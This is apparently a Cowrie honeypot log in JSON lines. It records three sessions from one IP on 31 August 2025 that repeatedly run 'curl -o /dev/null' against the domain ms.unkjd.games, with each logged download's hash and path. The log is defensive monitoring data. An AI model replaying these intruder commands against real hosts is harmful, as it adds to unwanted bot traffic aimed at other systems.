{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.360103Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.363071Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.390508Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.392533Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.394078Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.394579Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.397342Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.399315Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.402153Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.403059Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.418534Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.419219Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.425071Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.448975Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.452987Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.455665Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.457652Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.458610Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.465603Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.466871Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.467318Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.470942Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.471526Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.498408Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.500219Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.503465Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.506093Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.509816Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.512596Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.513213Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.514952Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.515623Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.517051Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.517651Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.522957Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.553337Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.555035Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.555992Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.559853Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.560675Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.563558Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.564505Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.569212Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.607309Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.610356Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.613730Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.615760Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.616531Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.619773Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.620810Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.624270Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.625152Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.630970Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.659221Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.659769Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.661358Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.662636Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.665913Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.669201Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.670000Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.673307Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.677001Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.703227Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.704006Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.707102Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.708370Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.709097Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.711920Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.715928Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.718221Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.719368Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.720024Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.749102Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
